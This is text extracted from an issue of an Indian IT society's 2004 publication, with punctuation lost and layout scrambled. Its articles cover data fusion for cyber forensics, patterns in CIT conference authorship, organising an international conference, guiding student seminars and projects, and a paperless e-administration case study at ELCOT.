Data-fusion technology has been appliedmost prominently to military applications suchas battlefield surveillance and tactical situationassessment Data fusion has also emerged incommercial applications such as roboticsmanufacturing medical diagnosis and remotesensing [11 13 14] In a typical militarycommand and control (C2) system data fusionsensors are used to observe electromagneticradiation acoustic and thermal energy nuclearparticles infrared radiation noise and othersignals [12] In cyberspace security systems thesensors are different because the environmentaldimension is different Instead of a missilelaunch and supersonic transport through theatmosphere cyberspace sensors observeinformation flowing in networks However justas C2 commanders are interested in the originvelocity threat and targets of a warhead thesecurity personnels are interested in the identityrate of attacks threats and targets of maliciousintruders and criminals

Sensor 1

Sensor n

Data

Acquisition

Data

Fusion

Feature Extraction and Interpretation

Identify required

data

PROCESS OF DATA FUSION

The fusion process opens a way to reacha better analysis and understanding of the datafrom the viewpoint of accuracy andor reliabilityby providing enhanced information frommultiple sources [1 7 16] When the sensorsprovide information about the same aspect of aspecific entity the redundancy can be used toincrease accuracy and reliability The inherentparallel nature of using the multiple sensorsmeans that these systems usually operate fasterthan a single sensor could One way of accessingthe performance of such type of fusion systemis to measure the enhancement or thedegradation in the information provided by thesystem

Data + Algorithms + Knowledge = Data Fusion

Fusion Techniques

There are various types of fusion techniques

1 Low level fusion2 Medium level fusion3 High level fusion

OITS-2004

19

In CFThe major goal of Computer Forensics is to

develop and apply the scientific methods infinding the solutions driven by practitionerrequirements and addressing the needsconsidering the current paradigms Profilingidentifying tracing and apprehending cybersuspects are the important issues of researchtoday The ultimate goal is to obtain sufficientevidence in order to trace the crime back to thecriminal Within a computer system theanonymity afforded the criminal encouragesdestructive behavior while making it extremelydifficult for Law Enforcers to prove the identityof the criminal Therefore the ability to obtainthe fingerprint of the users is imperative toacquire some hold on identifying the perpetrator

The studies of available Log files alwaysstand as fundamental in evidence collection Butat a higher level it is necessary to possess a morein depth ability to narrow the field or evenestablish a list of possible suspects So the needof the hour is to develop a concept frameworkto assist Law Enforcement and ForensicInvestigating Agencies to gather the digitalevidences against electronic crimes bydeveloping methodology tools technology andprinciples for analysis and examination leadingto PLDE for expert testimony in the Court of Law

Multisensor Data Fusion provides animportant functional framework for buildingAdvanced Security Management systems andcyberspace security awareness A significantchallenge remains for security systems designersto combine the data and information fromnumerous heterogeneous distributed systemsinto a coherent process that can be used toevaluate the security of the cyberspace

Multisensor data-fusion technology is animportant avenue on the road toward the

development of highly reliable security-decisionsystems that identify track and assesscyberspace situations with multiple complexthreats The output of Fusion-based securitysystems will be the estimates of the identity(location) of a threat source the maliciousactivity taxonomy of the threats the attack ratesand an assessment of the potential severity ofthe projected target(s) This information can beused for gathering the Legal Digital Evidence toprovide timely Justice and punish the criminalby efficiently and timely analyzing the cases4 CONCLUSION

There exist significant opportunities andnumerous technical challenges for thecommercial application of Data Fusion theoryinto the art and science of cyberspace securitysystems The data fusion process is in the veryearly stages of technical development Howeveras networks continue to grow and the expandingrealms of cyberspace evolve there will be anurgent need to drive various securitymanagement systems towards next-generationcapabilities Determining the origin of highlysophisticated damage in cyberspace willcontinue to grow in complexity as attackersbecome more cyberspace astute So the futureSecurity systems tracking coordinatedmultifaceted cyberspace attacks require clusteranalysis techniques adaptive neural networksand rule-based knowledge systems

Multisensor Data fusion is a multifacetedengineering approach requiring the integrationof numerous diverse disciplines such asstatistics artificial intelligence signalprocessing pattern recognition cognitive theorydetection theory and decision theory Integratedsensor and decision support tools are emergingrequirements for robust and reliable AdvancedSecurity management systems in complexinternetworks

OITS-2004

20

5 REFERENCES

[1] wwwdatafusionorg

[2] Approaches to improve automation forsecurity Cyber Information Assurance ampDecision Support (CIADS) InformationSystems Laboratory Applied ResearchLaboratories the University of Texas atAustin

[3] Handbook of Computer Crime InvestigationForensic Tools amp Technology by EoghanCasey (Editor) Academic Press 2002

[4] Internet Engineering Task Force NetworkWorking Group Guidelines for the SecureOperation of the Internet RFC1281Available on line ftpinfocertorgpubietfssphwg

[5] Policies to Enhance Computer and NetworkForensics Proceedings of the 2001 IEEEWorkshop on Information Assurance andSecurity United States Military AcademyWest Point NY 5-6 June 2001

[6] Hochberg et al NADIR An automated systemfor detecting network intrusion andmisuse Computers amp Security 1993Elsevier Science New York 235248

[7] D L Hall and J Llinas An introduction toMultisensor data fusion In Proceedingsof the IEEE vol 85 ndeg 1 pp 6-23 1997

[8] L A Klein Sensor and data fusion conceptsand applications Tutorial texts vol TT14 SPIE Optical Engineering Press USA131 p 1993

[9] Waltz E Information Warfare Principles andOperations 1998 Artech House BostonMA

[10] Hall D Mathematical Techniques inMultisensor Data Fusion 1992 ArtechHouse Boston MA

[11]L F Pau Sensor data fusion Journal ofIntelligent and Robotics Systems vol 1pp 103-116 1988

[12] DSTO (Defence Science and TechnologyOrganization) Data Fusion SpecialInterest Group Data fusion lexiconDepartment of Defence Australia 7 p21 September 1994

[13] Varshney P Distributed Detection and DataFusion 1995 Springer-Verlag NewYork NY

[14] Wald L A European proposal for terms ofreference in data fusion InternationalArchives of Photogrammetry and RemoteSensing Vol XXXII Part 7

[15]Cyber Forensics by Simson Garfinkel

[16] Waltz E and Llinas J Multisensor DataFusion 1990 Artech House Boston MA

OITS-2004

21

The Conferences on InformationTechnology or CITs as they are more popularlyknown have been organised by the OrissaInformation Technology Society every year since1998 It was the first ever internationalconference on IT to be held in Orissa and becamean instant hit The overwhelming success of thisedition conveyed the message that not only hadCIT arrived but it was here to stay Apart fromtheir successes academically these conferencesalso present some interesting patterns regardingthe multiplicity of the authors their regions aswell as the areas of research1 Multiplicity of authors

The papers presented in these conferenceshave had authors ranging between one andseven However it has been found that papershaving two and three authors have dominatedwhile papers having five or more authors havebeen few and far between (Fig1) The onlyexception came in the first edition when papershaving two authors comprised more than three-fifths of the total number of papers (Fig2) Thedetails of the multiplicity of authors have beenpresented in Table 1 which is drawn

Interesting Patterns in CITsA Misra

Silicon School of Information TechnologySilicon Hills Patia Bhubaneswar-751031

aurabindasiliconacin

2 Regions of participations In this section we will consider the

participating regions in terms of countries aswell as institutes With India being the hostcountry she has the maximum representationunderstandably But if we look at the trends inthe participation of other countries we can alsoobserve certain interesting patterns

Firstly the United States has the highestrepresentation from overseas having at least oneauthor in thirty-five papers over the six editionsIt is followed by Japan (11) and Australia(10) inthat order (Table 2) It may be noted with interestthat there were three papers from Brazil in the1999 edition but those are the only papers fromBrazil till date Besides there are about twelvecountries which have only one occurrence whileUSA and Japan have been represented in everyedition

However one discouraging factor has beenthe sharp decline in overseas participants overthe six editions (Fig 3) While in the first edition5405 of the papers had at least one overseasauthor the figure has been hovering around the25 mark in the last four editions In spite ofthis 2003 has recorded the highest number ofpapers having overseas particpation ietwenty-one

On the contrary papers from Orissa havebeen increasing steadily every year which hasbeen shown in Fig 4

As far as Institutes are concerned then theIITs have been the most prominent with theexceptions of IIT Delhi and IIT Roorkee whichhave respectively six and one one contributions

Number of authors per paperYear 1 2 3 4 5 6 71998 6 21 8 1 1 0 01999 8 12 13 8 1 2 02000 5 15 12 1 0 0 12001 3 20 24 5 1 0 02002 4 16 17 4 0 2 02003 9 34 33 4 3 0 0

Table 1

OITS-2004

22

Multiplicity patterns

Fig 11998

Fig 2

age of papers involving overseas au thors yearwise

Fig 3Year

Year

OITS-2004

23

till date Leading the pack are IIT Kharagpurwith thirty-five papers and IIT Guwahati withtwenty-seven Among the other IITs IIT Kanpurhas seventeen while IIT Bombay and IIT Madrashave nine apiece Among the other InstitutesJadavpur University has contributed seventeenpapers while University of Hyderabad hascontributed ten The list of the leading Institutesin terms of number of papers alongwith ayearwise breakdown is given in Table 3

Another interesting trend that can beobserved here is that while the USA leadsoverseas list none of the Institutes figure in thelist while one Institute from Japan figures in thelist It can be concluded that the papers from the

Country 1998 1999 2000 2001 2002 2003 TotalUSA 6 10 3 8 1 7 35

Netherlands 2 0 1 0 0 0 3Japan 2 3 1 3 1 1 11

Australia 3 0 1 1 2 3 10Kuwait 1 0 0 0 0 0 1China 1 0 0 0 0 1 2

Sweden 1 0 0 0 0 0 1UK 1 0 0 0 2 3 6

Portugal 1 0 0 0 0 0 1Italy 1 2 1 1 1 0 6

Canada 1 1 0 0 1 3 6Taiwan 0 1 0 0 0 0 1Brazil 0 3 0 0 0 0 3

Finland 0 1 0 0 0 0 1Mexico 0 1 0 0 0 0 1

Germany 0 1 1 0 0 0 2Malaysia 0 0 1 0 1 1 3

Macao 0 0 0 1 0 0 1Thailand 0 0 0 1 0 0 1Norway 0 0 0 1 1 0 2

Singapore 0 0 0 0 1 0 1Serbia amp

Montenegro 0 0 0 0 0 1 1Tanzania 0 0 0 0 0 1 1

Table 2USA have been scattered across the countrywhile those from Japan have been concentratedin some particular Institutes3 The Topics

As far the topics are concernedNetworking leads the table with a total ofthirtythree papers Among other topics ofprominence are Soft Computing with thirty-onepapers Web-based computing with eighteenand Parallel amp Distributed Computing withsixteen papers Even though there have beenpapers from almost all areas of ComputerScience none of those areas have featuredconsistently in these conferences

OITS-2004

24

Trends in papers having authors from Orissa

Fig 4

Bibliography1 Mahapatra RN ed CIT 98 Trends in

Information Technology Tata McGraw-HillNew Delhi

2 Mohanty H and Baral C ed CIT 99 Trendsin Information Technology Tata McGraw-Hill New Delhi

3 Ghosh RK and Misra D ed CIT 2000Proceedings of Third InternationaConference on Information Technology TataMcGraw-Hill New Delhi

Institute 1998 1999 2000 2001 2002 2003 TotalIIT Kharagpur India 5 0 3 8 5 15 36IIT Guwahati India 1 7 4 6 5 4 27

Jadavpur University India 5 3 0 5 2 2 17IIT Kanpur India 3 1 1 6 2 4 17

University of HyderabadIndia 0 1 0 5 1 3 10

IIT Bombay India 1 3 2 1 1 1 9IIT MadrasIndia 0 0 1 2 3 3 9Iwate PrefecturalUniversity Japan 2 1 1 2 1 1 8

Table 34 Pujari AK and Mohapatra P ed CIT 2001

Proceedings of Fourt InternationalConference on Information Technology TataMcGraw-Hill New Delhi

5 Iyer S and Naik S ed CIT 2002 Proceedingsof Fifth International Conference onInformation Technology Tata McGraw-HillNew Delhi

6 Chakraborty G and Sarkar S ed CIT 2003Proceedings of Sixth InternationalConference on Information Technology TataMcGraw-Hill New Delhi

Year

OITS-2004

25

Conference is an academic activity thatallows researchers from a particular field topresent their findings and take suggestions andcomments from peers Academicians who arenot even presenting papers also attend theconference in order to keep themselves abreastof developments in the particular field and alsoto network with other attendees for possibleresearch collaboration In academic world thereis always the pressure of publish or perishConferences are an outlet to help academiciansto publish

While western world has already masteredthe art of holding conferences developingcountries are slowly gearing up to hosting qualityconferences A quality conference in generalrequires both quality and quantity ofparticipation until and unless the conference isvery narrowly focused Holding a conferencerequires quite a bit of pre-preparation andplanning The conference team needs to managethe logistics of interacting with a large numberof authors reviewers invited speakers potentialsponsors and delegates besides maintaining dayto day communication among all the teammembers This article enumerates the strategiesadopted to enhance both the quantity andquality aspect of an international conference1 inthe area of information technology held inDecember 2003 This conference was successfulin terms of participation management and otheraspects as expressed by various attendees of theconference and also in comparison withprevious conferences held by the same group

Experiences amp Learning from Organising anInternational Conference in a Developing Country

Laxman MohantyPhD Scholar BITS-Pilani

T-10 IIM Campus Vastrapur Ahmedabad-380015

Extending the ReachThe first and foremost challenge for a

conference is to reach to potential authors andthen attract as many delegates as possibleThough the particular conference had been heldconsecutively for last 5 years and had created aname for itself still it remained more or lessconfined to members of the parent associationand their friends It was found that faculty ofmany engineering colleges in India were notaware of the conference but on being told aboutit they showed keen interest to participate in itThus to extend the reach of the conferencefollowing strategies were adopted An e-group was created with the e-mail IDs

found from the proceedings of previousconferences Later this group was extendedusing e-mail IDs received from manypostings received in other e-groups likeBytesforall and IDs received from anotherteam member This e-group was used tobroadcast the call for paper (CFP)announcement 2 to 3 times Request was alsomade to members to forward the call forpaper to all people they knew and whowould be interested in the conference

An address list of engineering colleges ofIndia derived from the approved list ofengineering colleges of All India Council ofTechnical Education (AICTE) was preparedThis list was enriched by the addresses ofIndian Institutes of Technology (IITs)National Institutes of Technology (NITs)Indian Institutes of Information Technology

1 The author was the Organising Chair of theConference

OITS-2004

26

(IIITs) all RampD centers of Council ofScientific amp Industrial Research (CSIR) andother special institutions like Center forDevelopment of Advanced Computing (C-DAC) National Center for SoftwareTechnology (NCST) etc This list was usedto send the CFP poster so that facultyconcerned there could participate in theconference

A specific website was registered and usedto disseminate all information regarding theconference This website was also registeredwith several search engines All theconference documents carried the addressof this website The website also carried allcontact details of the organizing team

The website also carried links to four otherrelated conferences happening about at thesame time in the country and similarly thoseconference websites also provided links tothe website of this conference This crosslinking helped all the conferences to beknown to a large number of potentialparticipants

An address list of magazine and journalsrelated to IT and higher education likeUniversity News and Data Quest wasprepared and a brief write up about theconference was sent to those periodicalsMost of these magazines carried theinformation about the conference Thismethod worked well as judged from severalenquiries received which referred to thenews article in University News

Attracting Large Number of DelegatesThe second task was to attract large

number of delegates A focused effort was madefor achieving this Two separate documents wereprepared Advance Program booklet thatcontained details of the technical session and aposter for special events A symposium on ITamp Education industry session on Sustaining

Indias leadership in IT and student tutorialswere organized as three special events to havelarger public participation in the conferenceBoth the Advance Program booklet and theSpecial Events poster were sent by post to theauthors whose papers were selected and thespeakers who were invited for various talksThere were two fold reasons for this strategy 1)Authors and speakers would know details ofthe program and 2) they would use those twodocuments to invite their colleagues to theconference It was assumed that those authorswould take greater interest in spreading theinformation about the conference as comparedto the communication sent as a generic mail tothe head of the institution

The poster which contained details aboutspecific public events was distributed amongthe teachers of schools and colleges industryprofessionals and policy makers in the citywhere the conference was being held It was doneto enhance local participation in those publicevents

The conference was able to attract 246papers from 11 countries and this was almostdouble of what earlier conferences could attractIn fact this large number of papers increasedthe task of the Program Chairs beyondexpectation and they had to recruit morereviewers This also doubled the task ofinforming authors about the status of theirpapers acceptancerejection and finallydirection for final submissionCoordination Among the Organizing Team

The conference team consisted ofprofessionals working in various institutionsspread over different countries like India Japanand USA In India the members were fromdifferent cities Owing to team members beinglocated physically in different places physicalmeeting and planning were eliminatedCyberspace was extensively used to plan and

OITS-2004

27

decide various issues regarding the conferenceThree specific e-groups were created for variousrequirements Egroup1 This e-group contained the e-mail

IDs of the chairs of the conference It wasused to appraise other members regardingwho is doing what Also suggestions weresought for various issues such as publishersto be approached for proceedings who wereto be invited for keynote and special talksand which places to be included in the sightseeing tour etc

Egroup2 This e-group was a super set ofegroup1 and contained e-mail IDs of chairsof the present conference and the pastconferences It was assumed that this groupby being involved in 6 editions of thisconference (including the current one) helda large knowledgebase that can be used tosort out various policy issues regarding theconference For example issues likeregistration fee what type of tutorials andwhat facilities to be extended to variousinvited speakers were discussed anddecided upon through this e-group

Egroup3 This e-group comprised of themembers of the parent association of theconference This e-group was used to keepthe group members informed about thedevelopments of the conference and alsogalvanize support for participation andpublicity

Several members of the parent associationobserved during the conference that though theywere not actively contributing to any discussionin the e-group yet they were happy to get allstatus reports about the conference and be partof the discussions among the members

Besides these groups a large number of one-to-one and one-to-many e-mail exchanges weremade to facilitate information sharing anddecision making

It may be noted that the organizing team ofthe conference acted more like a virtual team withmembers physically located at various placesin the world Interestingly many members didnot know other members personally Thus it wasdecided that in the website the name of eachconference chair will be linked to hisherpersonal web pages so that other members canlook at those pages and become familiar withthe persons they are workingReviewing the Papers

Receiving papers reviewing theminforming the authors about the acceptancerejection of their papers and finally receivingthe camera ready papers are some of the criticalfunctions that needed to be done with great careCyberspace was extensively used to carry outthese activities thus making execution of tasksfaster accurate and inexpensive Though therewas no facility for online submission authorscould e-mail their papers to either of the ProgramChairs Each paper was to be reviewed by atleast two reviewers Private HTML pages werecreated to facilitate this review process TheseHTML pages carried the following informationabout the papers submitted - numbers titleswhether reviewers found or not for a given paperand if found whether two reviewers were foundReviewers were given the access to those pagesand were asked to select the papers which wereyet to be allotted for review and the ones theywould like to review They could then downloadthe concerned papers for review E-mails wereused to receive reviews from the reviewers andcommunicate the same to authors withselection rejection status of their papers Finalpapers were also received through e-mails fromthe authorsDelegation

Though the committee of chairs wasresponsible for all basic activities yet it was notpossible for this committee to handle allresponsibilities especially those related to local

OITS-2004

28

arrangements Thus a committee of coordinatorsfor various activities was formed to handlevarious sub functions For example acoordinator was especially designated to lookafter accommodation and local conveyance ofguest speakers and delegates The conferencewas providing accommodation to around 20 oddguest speakers and they were to reach the venueat different dates and times and from differentcountries Receiving them putting them up inhotels and enabling them to reach the conferencevenue were all complex tasks and needed fulltime attention of one person

Besides accommodation and localconveyance there were coordinators forregistration arrangement at the conferencevenue poster session and special programs etcThe details of this coordination team were putup on the website and delegates were informedthrough e-mails to get in touch with the relevantcoordinator for their queries and requirementsThe coordinators were the faculty members ofthe host college and each coordinator wasassisted by a team of student volunteers fromthe same college

This arrangement not only ensured smoothfunctioning of the conference it increasedinvolvement of a large number of facultymembers The coordinators also appreciated therecognition they received For student volunteersit was a great learning opportunityExtending the Scope of the Conference

By nature a conference is an academicfunction and only involves researchers andacademicians from different institutions But thisconference was designed also to accommodatestudents industry representatives and teachersfrom schools and colleges Three special eventswere organized for this target group asymposium for educators an industry sessionfor students researchers and teachers andtutorials specially designed for students Allthese sessions were very successful and attracted

a large number of participants from the city Thusthe conference could benefit the community inthe local contextThe Financing Model

The conference also had a unique financingmodel Its registration fee was kept sufficientlylow to attract large number of participants Thusthe registration fees alone were not sufficient tomeet all the expenses Though the conference isorganized by an association in reality a localengineering college takes the lead every year inhosting it while other colleges provide financialsupport So a large part of the financialrequirement was met by the contribution fromthe local engineering colleges In return thesecolleges were given free registration for certainnumber of participants in the conference andthe tutorials

Tutorials were designed in such a way(content duration course materials and otherfacilities wise) that participants would not mindpaying to attend them Independentsponsorships were sought from local collegesfor special events and this was acknowledgedduring the event Besides association membersstaying abroad were able to garner a large chunkof financial support from some corporates Govtorganization like CSIR also extended somesupport The conference was able to generate asmall surplus besides meeting all its needs Thissurplus is given to the parent association to carryout computer awareness activitiesConclusion

The whole experience of being part of theorganizing team that carried out planningdesigning and organizing of the conferenceshowed that by bringing in innovation todifferent dimensions of the conference a teamcan not only enhance both the quality andquantity of participation among variousstakeholders it can turn the whole experienceinto an enriching and fun filled experience

OITS-2004

29

Guiding Seminars and Projects for UndergraduateEngineering Students

MN DasProfessor amp HOD

Computer Science amp Engineering and IT

IntroductionConduct seminar presentation and projects

for undergraduate engineering students in theirfinal year is an important and statutory part ofany university curriculum Seminar measuresmostly the external abilities and projectmeasures the internal abilities of a studentThrough seminar besides the technicalknowledge the presentation communicationand interpersonal skills of a student also getreflected Through project the depth of technicalknowledge acquired amp degree of understandingon fundamentals of engineering subjects by thestudent get evaluated Also to some extent thepresentation skills of a student gets reflect whenhe or she submits the project report and presentsbefore the audience (examiners studentcolleagues etc) A student goes through varietiesof engineering subjects (both theory andsessional) during his or her engineering studtyThese papers are mainly divided into twocategories (i) Core papers amp (ii) Supportingpapers Seminars and projects are based on thethorough understanding of all these papers bythe students Besides these course curriculumknowledge the projects amp seminars are alsobased on the extra or additional knowledgeacquired by the students by going throughvarious journals magazines research papersCDs internet amp reference books etc and byattending several tutorials workshopsseminars conferences symposiums andtechnical competitions etc

In short seminar and project are one typeof indicators of a students mental capability and

orientation to face and accept the practical andtechnical challenges in the real scenarios infuture

Role of faculty members as guides aco-guides

A student needs active support from his orher guide or co-guide for preparing himself orherself to present seminar and carrying out aproject work successfully Normally this guideis one of the faculty members of the concerneddepartment But some cases when a studentcarries out a project work in an organizationother than his or her institute a member of thatorganization becomes the guide However inthat case one of the faculty members of thedepartment must become a co-guide The role orthe co-guide is very important in the sense thathe or she has to orient the project done by thestudents as per the University guidelines Aseminar can be presented individually or ingroup (normally no of group members shouldnot exceed 3) Each Seminar team (either onemember or multiple members) must be linkedwith a guide called seminar guide Similarly aproject can be done individually or in group(normally no of group members should notexceed 5) Each project team (either one memberor multiple members) must be linked with a guideor co-guide called project guide or project co-guide Selecting a guide by a student group orvice versa is normally done through mutualconsultation Head of the department can playthe role of a negotiator in this situation For abetter focus and attention no of project teamsunder the supervision of a project guide or co-

OITS-2004

30

guide should not exceed 2 and no of seminarteams under the supervision of a seminar guideshould not exceed 4 Each group (either projector seminar) must submit an abstract or synopsisof the work to be done or presentation to be madeto their respective guides sufficiently before thecommencement of project work or seminarpresentation Seminar guides must ensure thattopics of seminars are of advanced amp state-of-the-art type These topics should not be from theUniversity course curriculum but can be basedon the basics of these subjects A schedule forthe seminar presentations should be notified byHOD to all concerned in a tabular manner withthe following fields representing the columns

rapport with them by directly speaking andby using proper eye contact A keennessshould be shown to them that thispresentation is for their learning amp benefitonly

b) The Middle bit is usually longest and canhave several sections This is structured witha logical sequence Movement from one areaor topic to another is done using verbal orvisual links OHP or LCD acetates are usefulfor breaking the middle bit up into smallerchunks

c) The End of the presentation should be asummary a conclusion a logical end to whathas gone before

iii) PracticeA number of practices should be made

about the presentation in front of the mirror infront of the cat before friends amp on ones ownetc If possible the audio visual equipments likeOHP LCD etc can be tried out before the actualday of presentations During practice feed backcan be obtained from friends regarding thespeaking speed (ie whether too fast or too slow)the visual aids (whether clear or not) logicalmovement of sequence (whether correct or not)amp overall performance (whether excellent goodor poor etc)

Following hints amp tips may be followedduring practice or at the time of actualpresentation Breathe slowly it calms you down Speak audibly but dont shout Speak at normal pare not very fast not

very slow Speak clearly Be enthusiastic Avoid using jargons and colloquialisms

unless these are familiar to the audience Be aware of your gestures

Date Time Slot Group Title of Formatof topic presentation

(LCD OHP)

Guidelines for Seminar Presentation3 PS Preparation Planning amp practicei) PreparationPreparation for seminar presentation can

be effectively done if the following questions areasked to themselves by the students concerned What do I want the audience to LEARN or

DO as a result of my presentation How can I keep the audience interested Do I know my subject

Fundamental rule is that keep itstraightforwardly simple which is abbreviatedas KISS

ii) Planning-Any form of communication should have

a structure Beginning a Middle bit and anEnda) The Beginning should tell the audience

what the presenter(s) is going to tell them Itshould be positive Presenter should engagethe audiences attention and establish

OITS-2004

31

Use large fonts if LCD or OHP are beingused

Learn from watching others follow thestrength amp reject the weaknesses of otherspeakers

Use lots of figures diagrams charts ampgraphs etc

Point to the projection (screen) not thesource

Maintain the timing perfectly

Guidelines for Project Presentation(We have assumed that project guides

project teams amp topics of the projects havealready been finalized)1st Step- Write the abstracts or synopsis of theproject2nd Step- Set a realistic timeframe

Assuming 100 effectives working days ina semester the following is a sample break upDefine your problem - - - - - - - -Write a proposal - - - - - - - -- - -Develop your solution - - - - - - -Implement your solution - - - - -Present your solution - - - - - - -Submit the project report - - - - -3rd Step-

Make proper evaluation amp assessment ofperformance of the students on the basis of finalproducts (results reports and presentation) andthe process by which they were attained Thegrade is given for the entirety of the project Asample grade system may be as followsA a consistently excellent effort that attains

project goalsB a consistently good effort that attains project

goalsC an acceptable effort that at least partially

attains the project goals

D an inconsistent or unsatisfactory effort thatonly partially attains project goals

F an unsatisfactory effort that does not attainproject goals

Tips for writing project reports 1) Sketch the outline of the project2) Expand your outline3) Write your paper4) Rewrite until you get it right

A sample outline for project reports Introduction Background Design Implementation System in Action Results Future work Conclusion ReferenceBesides these the cover page design

acknowledgement topic index index for figuresamp tales etc can be added at proper locations ofthe project report

ConclusionSince projects amp seminars are indicators of

internal amp external abilities of the engineeringstudents the respective faculty guides or co-guides must motivate their students in such amanner that they do not resort to any kind offalse means for carrying out these two mostimportant activities of their student carrer

20 days

20 days

60 days

About the author Prof MN Das is currently Professoramp HOD in the Department of Computer Science ampEngineering at KIIT Deemed University After completinghis BE in Electronics amp Telecommunication branch in1987 from UCE Burla he was with ECIL Hyderabadfor few months in its computer group Then he joinedas a lecturer in the Dept of Electronic amp Tele commengineering dept of UCE Burla and continued upto1987 He completed his ME in Electronics systems ampcommunication during this period He then joined OrissaState Electronic Development Corporation (OSEDC) Ltdfor 1987 amp continued upto 2002 During that period hecompleted his PG Diploma in Management atXIMBAfter a long 16yrs inducted experience in various areashe joined KIIT Deemed University from 2002 onwards

OITS-2004

32

Information and CommunicationTechnology (ICT) has today become an integralpart of governance especially in India ICT isviewed as a tool that will help deliver servicesboth in the public and the private sector to theubiquitous common man What used to takeyears to compile and analyse now takes just afew seconds or minutes

E-governance as a concept involvesleveraging ICT to streamline the administrativeprocess it involves computerisation of recordsfacilitating efficient transactions betweenvarious government departments networkingoffices and using websites and e-mail to bringadministrators closer to people

In the past decade e-governance has beena popular buzzword among politicians andbureaucrats alike especially in India One quasi-Government organisation in Tamil Nadu hasdecided to go the distance by implementing e-governance at a micro level their office is nowcompletely paperless and file-transfer takesplace in an electronic format

Using a tool aptly titled e-Administration Chennai-based ElectronicsCorporation of Tamil Nadu Ltd (ELCOT) withthe help of an Information and CommunicationTechnologies (ICT) organisation called Life-Lineto Business (LL2BCOM) has introduced aworkflow and document management processsans physical movement or use of paper

Designated by the Government of TamilNadu to promote IT industries in the stateELCOT besides supporting IT entrepreneurs also

Case study on ICT and e-GovKrishnan V D G

ICT amp e-Gov Specialistkrisdevgmailcom

promotes joint ventures in electronicscommunication and IT They also help developinfrastructure for the software industry in theform of IT parks and by providing effectivecommunication backbones

LL2BCOMs e-Administration toolallows ELCOT officials to sanction purchasesapprove official activities and transfer filesflawlessly in completely electronic format Witha view to introduce transparency in theirworkflow process all the files processed in theorganisation are made available on a centralserver while the status of pending files can beobtained at any stage There is no physicalmovement of files at any stage only the finalorder copies are printed and stored as physicalrecord

The Nuts and BoltsAs part of its e-governance initiative the

Government of Tamil Nadu embarked on apaper-less office drive for introducingtransparency and accountability in its internaland external transactions

ELCOT the nodal organization for ITactivities in the state decided to introduce e-Administration a paperless FileManagement System which ensures speedydisposal of files The entire process creationmovement monitoring and approval of filestakes place electronically resulting in betterutilisation of manpower This helps avoidingdelays which leads to better governanceaccording to Sudeep Jain IAS MD ELCOT

OITS-2004

33

e-Administration is the brainchild of ICTand e-Gov specialist VDG Krishnan who hasover a quarter of a century hands-on managerialexperience in the Public Sector in India and aleading MNC in North South America He isthe Founder President of Life-Line to Business(LL2BCOM Pvt Ltd) His urge was to developa simple yet effective solution that can help totransform the Governments Corporates SMEsand NGOs The tool was conceived by him afterhis return to India as an apt solution for e-Governance in the developing world based onhis experience in both the developing and thedeveloped world

e-Administration is a web-enabledplatform-independent paperless solutiondeveloped on an Open Source platform forpaperless communication within and outsidean organization It uses open source offeringssuch as J2EE JBOSS PGSQL all running onLinux

The tool according to Krishnan canreduce the cycle time for file approval from anaverage of two to three weeks to one week Thiscan also result in a considerable reduction ofpaper-usage within an organisation therebysaving valuable natural resources

According to Krishnan LL2Bs toolempowers every employee in the organizationto discharge his or her duties efficiently It hasalso reduced the dependence on subordinatesand makes the organization system-orientedrather than people-centric This is likely to resultin increased productivity

Being a Linux platform local languagecontent can also be easily added This tool canbe used by any organization whose activitiesinvolve dealing with multiple agencies forsimultaneous review and action The tool also

aids knowledge management and integrationin NGOs for self-assessment decentralised fieldupdating and centralised review andmonitoring

The ProcessELCOT conducted trials with products

offered by four to five SMEs for independentevaluation with a view to adopt the best toolThe SMEs were asked to implement thenecessary customisations to suit therequirements of ELCOT Govt

Trials were conducted over three to twelvemonths with equal opportunity given to all thevendors In each department one system wasconfigured as the server and five nodes (on anaverage) connected as clients for live testing

Says K Appuswamy General Manager (e-Governance) Many organizations hadconducted trials but only LL2Bs model workedsuccessfully at ELCOT

LL2BCOMs product was one of the fiveLAN based solutions tried out the front-endwas based on Visual Basic while the backendwas Microsoft Access SQL running on aMicrosoft Windows 2000 server in the initialtrials This tool was initially installed inELCOTs Marketing Department for about 5officers Seeing the effective use of the tool moreofficers and staff came forward voluntarily touse the tool Steadily the number was increasedand the solution upgraded to a browser basedweb version for removing the dependence onclient systems

Currently e-Administration systemconnects about 150 users in three differentlocations spread over a distance of about 25 KMsincluding their Corporate Office at Nandanamtheir Communication Division at Perungudy

OITS-2004

34

and their Chairman Mr Vivek Harinarain IASwho is the Secretary IT Govt of Tamil Nadu atthe Secretariat through a dedicated powerfulfour-way Xeon dual Processor with RAIDfacility running a versatile Oracle 9i databaseas backend on Linux advanced server centrallylocated at ELCOT Corporate office

The tool simplifies the process of generatingfiles and enables moving note sheetselectronically for approval Instead of physicallycarrying note sheets for approval from table totable the employees began using the tool Receiptof the e-document was indicated by pop-up alertmessages on the officers monitors

All letters received from external agenciescould now be scanned and converted intoelectronic documents which would then beadded to the central repository This systemenables a user to check the status of a file at anystage More importantly delays are minimisedas the files can be traced instantly through thenetwork employees can now know whichofficer has kept the file pending

The biggest advantage of e-Administration is that it enables us to view atany stage the status of pending file The detailsare available on a central server and can beaccessed by anyone having the authority Thisway workflow is simplified

LL2Bs e-Administration tool not onlyeffects a dramatic reduction of stationary usageand time taken to process documents it alsoserves to introduce transparency in the workingof any organisation

The employees of ELCOT also took to thesystem rather well According to AppuswamyOur employees became more and morecomfortable with using the tool as the trialsprogressed Its quite user-friendly and doesnt

require a lot of technical expertise I myself beganusing the system without any formal trainingand have been using it successfully for eightmonths now

AccoladesAt the 7th National e-Gov conference held

in Chennai in November 2003 MD ELCOTreceived a merit citation award from Governmentof India for implementation of e-Administration as a tool for e-Governance

The Industrial Guidance Bureau of theGovernment of Pondicherry has implementedan integrated e-Platform a quickly customizedsolution of e-Administration to automate theactivities of the Department of Industries andCommerce (Refer Budget 2004-2005 Addressof HE the Lt Governor Pondicherry httpwwwp on nic inopend eptsf in anc elgspeech2004pdf)

Item 7 of the speech reads as followsRemoval of poverty may not be

practically possible without focusing specialattention on creation of gainful jobopportunities The Tenth plan at the nationallevel envisages creation of 50 million newemployment opportunities over a period of fiveyears Therefore focused attention will be givento few critical sectors such as

Industries Information Technology etcwhich have very high employment potential

Item 19 of the speech reads as followsThe manufacturing sector of the economy

has potential to absorb the surplus labour forceThe labour intensive manufacturing units canprovide gainful job opportunities for skilled aswell as semi-skilled labour force We willcontinue to encourage new entrepreneurs tochoose Pondicherry as their destination for

OITS-2004

35

